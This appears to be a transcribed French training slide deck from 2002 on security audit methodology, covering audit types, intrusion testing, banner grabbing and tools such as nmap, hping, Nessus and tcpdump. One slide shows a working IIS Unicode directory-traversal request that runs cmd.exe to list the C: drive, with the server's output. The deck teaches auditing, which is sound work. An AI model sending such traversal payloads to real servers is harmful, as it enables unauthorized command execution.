Progression Sécurité & réseaux TCP/IP - Cours1 : Révision réseaux

Présentation au sujet: "Progression Sécurité & réseaux TCP/IP - Cours1 : Révision réseaux"— Transcription de la présentation:

1 Progression Sécurité & réseaux TCP/IP - Cours1 : Révision réseaux
Méthodologie d’audit 15/11/2002 Ciefa Poly-informatique 20/06/ Ciefa Poly-informatique

2 Ciefa Poly-informatique
Plan du cours Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

3 Ciefa Poly-informatique
Introduction L’audit de sécurité est la première étape de la démarche conduisant à la définition et à la mise en place d’une politique sécurité. But : donner à tout responsable de système d’information, une image pertinente de l’état de sécurité de ses moyens informatiques face aux menaces et risques les plus couramment référencés dans l’état de l’art de la sécurité des systèmes d’information. Destiné à relever et lister les vulnérabilités éventuelles du système d’information. Porte donc à la fois sur : l’organisation l’implémentation des moyens informatiques l’exploitation de ces moyens 15/11/2002 Ciefa Poly-informatique

4 Ciefa Poly-informatique
Partie 1 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

5 Différents types d’audit
Audit de vérification => analyse de l’état du système Audit d’agrément => conformité à un référentiel prédéfini Audit intrusif => recherche active des failles 15/11/2002 Ciefa Poly-informatique

6 Ciefa Poly-informatique
Audit de vérification Analyse de l’état d’un système ou d’un réseau - Organisation (personnel, procédures) - Configuration (réseau, organisationnelle) - Exploitation (ressources) - Compétence (résultats en accords avec moyens mis en œuvre) - Protocoles utilisés Vérification par rapport : - aux bonnes pratiques du métier - à la politique de sécurité - aux besoins exprimés par le demandeur Indépendant de tout travail existant ; permet une bonne idée de la situation 15/11/2002 Ciefa Poly-informatique

7 Ciefa Poly-informatique
Audit d’agrément Développement d’un document d’exigences de sécurité ou règles d’exploitation exhaustives - Consensus entre les acteurs : utilisateurs, administrateurs, sécurité… - Spécifique à une architecture, un ensemble de produits ou un environnement précis - Accompagné d’un cahier d’agrément expliquant comment vérifier les exigences => Formalisme L’agrément vérifie le respect des exigences ou règles par rapport au référentiel 15/11/2002 Ciefa Poly-informatique

8 Ciefa Poly-informatique
Audit intrusif Le seul audit dont le résultat sensibilise les hiérarchies - Recherche active de failles - Base de données de vulnérabilités Approche par la tentative d’intrusion - Réalisée sans les exploitants - Dépendant de la compétence de l’auditeur - Dans un environnement plus large Mêmes outils que ces attaquants malveillants 15/11/2002 Ciefa Poly-informatique

9 Ciefa Poly-informatique
Nécessité d’un audit ? En France : % des réseaux informatiques sont vulnérables 65% des entreprises sont victimes d’intrusions 95% de ces intrusions ne sont même pas détectées En 2001, les attaques informatiques ont représenté un coût global de 1600 milliards de dollars. En 2001, 85% des entreprises et des services publics américains ont rapporté une intrusion informatique telle qu'un vol d'information propriétaire, une fraude financière, l'intrusion de personnes extérieures dans leur système, une attaque de déni de service ou un sabotage de leurs données ou réseau. 40% des entreprises interrogées ont rapporté une intrusion par un tiers extérieur (20% en 1997). 38% ont détecté une attaque de type Déni de service (24% en 1998). (Source: 2001 Computer Crime & Security Survey, Computer Security Institute). 15/11/2002 Ciefa Poly-informatique

10 Exemple d’audit : architecture réseau
Objectif : déterminer les points faibles d’une architecture Méthodologie : - Analyse fonctionnelle - Plan d’adressage, cloisonnement IP - Rôle des sous réseaux et de chaque composant - Redondance des protections - Choix des matériels et logiciels - Recherche des éléments sur lesquels repose la sécurité - Recherche des communications avec l’extérieur - Plan de secours - Résistance au déni de service - … 15/11/2002 Ciefa Poly-informatique

11 Ciefa Poly-informatique
Tests d’intrusion Définition : tentative de compromission de la sécurité Types de tests d’intrusion : - de l’extérieur : test d’intrusion externe - de l’intérieur : audit intrusif interne Sans connaissance : intrus externe à l’entreprise Avec connaissances internes : reproduit le cas d’un employé malveillant => Souvent réalisés après résultats de l’audit pour limiter les dégâts (DoS) 15/11/2002 Ciefa Poly-informatique

12 Tests de vulnérabilité
Vulnérabilités : - faille dans un logiciel - erreur de configuration d’un équipement Outils : - Nessus : tout en un - Recherche et tests de ports ouverts : Nmap, hping Objectifs : - Trouver, à distance et de manière automatique, des services ouverts - Tenter de déterminer si une vulnérabilité connue est présente 15/11/2002 Ciefa Poly-informatique

13 Ciefa Poly-informatique
Partie 2 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

14 Ciefa Poly-informatique
Utilisation des ports Ports TCP : plupart des services classiques souvent ouverts (21, 22, 23, 25, 80, …) Ports UDP : scan de port fermé => flag RST facilement filtrable par firewall… => seul moyen est alors de tester les applications courantes ftp Scan NMAP option –0 sur chaque port => assurance de bonnes indications sur OS (dans cas de routeur adsl ou autre…) 15/11/2002 Ciefa Poly-informatique

15 Recherche des bannières
Service FTP : $ ftp Connected to FTP server (Hummingbird Communications Ltd. (HCLFTPD) Version ) ready. Service SSH : $ telnet Trying Connected to Escape character is '^]'. SSH-1.99-OpenSSH_3.0.2p1 Debian 1:3.0.2p1-9 Service Telnet : $ telnet Debian GNU/Linux 2.2 serveur.ssir.com Login : Service SMTP : $ telnet ... 220 serveur.ssir.com ESMTP Exim 3.12 #1 Mon, 10 Jun :56: 15/11/2002 Ciefa Poly-informatique

16 Ciefa Poly-informatique
Faille serveur IIS =>un serveur IIS peut être sensible aux attaques de type URL encodée $ echo "GET /scripts/..%255c..%255c..%255cwinnt/System32/cmd.exe?/c+dir+c:\\ HTTP/1.0 " | stunnel -c -r :443 HTTP/ OK Server: Microsoft-IIS/5.0 Server: Microsoft-IIS/5.0 Date: Fri, 17 Jun :47:35 GMT Content-Type: application/octet-stream Le volume dans le lecteur C n'a pas de nom. Le numero de serie du volume est 9C5F-0FCD Repertoire de c:\ 01/01/ :19 <DIR> Documents and Settings 01/01/ :19 <DIR> I386 10/06/ :44 <DIR> Inetpub 05/05/ :17 <DIR> My Music 17/06/ :26 <DIR> Program Files 17/05/ : PUTTY.RND 25/04/ :21 <DIR> TEMP 18/06/ :46 <DIR> WINNT 1 fichier(s) 1á223á476 octets 7 Rep(s) 3á385á342á976 octets libres 15/11/2002 Ciefa Poly-informatique

17 Ciefa Poly-informatique
Autres pistes En cas de présence d’un routeur passerelle connue du réseau : essai adresse interne pour IP Spoofing… Travail sur les TTL (pour déterminer OS, architecture, …) Passage mode passif du FTP (pasv) pour trouver adresse interne par exemple… Exploitation services comme SMTP, etc… 15/11/2002 Ciefa Poly-informatique

18 Ciefa Poly-informatique
Partie 3 Différents types d’audit Pistes possibles d’audit Outils d’audit et d’attaque 15/11/2002 Ciefa Poly-informatique

19 Outils d’audit et d’attaque
Nmap Hping Hunt Nessus Tcpdump Ethereal 15/11/2002 Ciefa Poly-informatique

20 Ciefa Poly-informatique
NMAP Développé et disponible sur Scanner de ports et de machines Référence de la prise d’empreinte Utilisation : « nmap <options> machine » 15/11/2002 Ciefa Poly-informatique

21 NMAP : principales options
nmap –O : OS Fingerprint nmap --osscan_guess : Option non référencée donnant les résultats probables de la prise d’empreinte en cas d’échec nmap –P0 : pas de ping (utile derrière un firewall) nmap –PT : TCP Ping nmap –p 1:1024 : Liste de ports à scanner 15/11/2002 Ciefa Poly-informatique

22 Ciefa Poly-informatique
NMAP : osscan_guess # nmap --osscan_guess -sS -O -p n -P Starting nmap V. 2.54BETA5 ( ) Interesting ports on ( ): (The 6 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 25/tcp open smtp TCP Sequence Prediction: Class=random positive increments Difficulty=2830 (Medium) Aggressive OS guesses: FreeBSD 3.2-STABLE (91%), Microsoft NT 4.0 Server SP5 Hotfixes (90%), Windows 2000 RC1 through final release (90%), Windows 2000 Professional, Build 2128 (90%), Windows Millenium Edition v (90%), HP-UX (89%), Cisco IOS 12.0(3.3)S (perhaps a 7200) (88%), F5labs Big/IP HA TCP/IP Load Balancer (BSDI kernel/x86) (88%) No exact OS matches for host (If you know what OS is running on it, see 15/11/2002 Ciefa Poly-informatique

23 NMAP : principaux types de scan
nmap –sT (Scan par défaut): connexion TCP nmap –sS : TCP SYN scan nmap –sF : TCP FIN scan nmap –sU : UDP scan nmap –sP : ping scan utilisé pour scanner des plages d’adresses nmap –s0 : scan de protocoles transportés par IP 15/11/2002 Ciefa Poly-informatique

24 Ciefa Poly-informatique
HPING Boîte à outils permettant de créer des paquets IP Permet de tester finement des règles de filtrage Analyse les paquets retour précisément 15/11/2002 Ciefa Poly-informatique

25 HPING : principales options
hping –SFRA : bits SYN,FIN,RST,ACK Hping –1 : ICMP (-C pour type) hping –2 : UDP hping –c N : N paquets (défaut : illimité) hping –T : Traceroute 15/11/2002 Ciefa Poly-informatique

26 Ciefa Poly-informatique
HPING 15/11/2002 Ciefa Poly-informatique

27 Ciefa Poly-informatique
HPING 15/11/2002 Ciefa Poly-informatique

28 Ciefa Poly-informatique
HUNT Outil de surveillance réseau évolué Permet de surveiller un réseau en reconstituant les sessions TCP Permet d’insérer des paquets dans une session TCP ( Génère une tempête ACK) 15/11/2002 Ciefa Poly-informatique

29 Ciefa Poly-informatique
TCPDUMP Sniffer réseau en ligne de commande Fonctionnalités de filtrage avancées (librairie pcap) Exemple : tcpdump –i eth0 –p host 15/11/2002 Ciefa Poly-informatique

30 Ciefa Poly-informatique
TCPDUMP 15/11/2002 Ciefa Poly-informatique

31 Ciefa Poly-informatique
NESSUS Sonde d’audit en réseau permettant de : Scanner les vulnérabilités réseau Scanner les vulnérabilités applicatives (bannières, CGI, buffer-overflows,…) Élément actif qui réalise les attaques (les plus nocives sont désactivées par défaut)  Attention aux DoS sur les sondes de détection 15/11/2002 Ciefa Poly-informatique

32 Ciefa Poly-informatique
NESSUS Disponible sur Clients pour Unix, Windows Serveur pour Unix seulement 15/11/2002 Ciefa Poly-informatique

33 NESSUS : Fonctionnement
15/11/2002 Ciefa Poly-informatique

34 Ciefa Poly-informatique
NESSUS Mise à jour régulière des vulnérabilités Utilise un langage de script spécifique  Personnalisation possible 15/11/2002 Ciefa Poly-informatique

35 NESSUS : Interface client
# # The script code starts here port = get_kb_item("Services/www"); if(!port)port = 80; banner = get_kb_item(string("www/banner/", port)); if(!banner) { if(get_port_state(port)) soc = open_sock_tcp(port); if(soc) req = string("GET / HTTP/1.0\r\n\r\n"); send(socket:soc, data:req); banner = recv(socket:soc, length:1024); close(soc); } if(banner) if(egrep(pattern:"^Server: Zope\/Zope 2\.((0\..*)|(1\.[0-6]))", string:banner)) security_hole(port); 15/11/2002 Ciefa Poly-informatique

36 NESSUS : Interface client
15/11/2002 Ciefa Poly-informatique

37 NESSUS : Interface client
15/11/2002 Ciefa Poly-informatique

38 NESSUS : Interface client
15/11/2002 Ciefa Poly-informatique

39 NESSUS : Interface client
15/11/2002 Ciefa Poly-informatique

40 NESSUS : Interface client
15/11/2002 Ciefa Poly-informatique

41 NESSUS : Interface client
15/11/2002 Ciefa Poly-informatique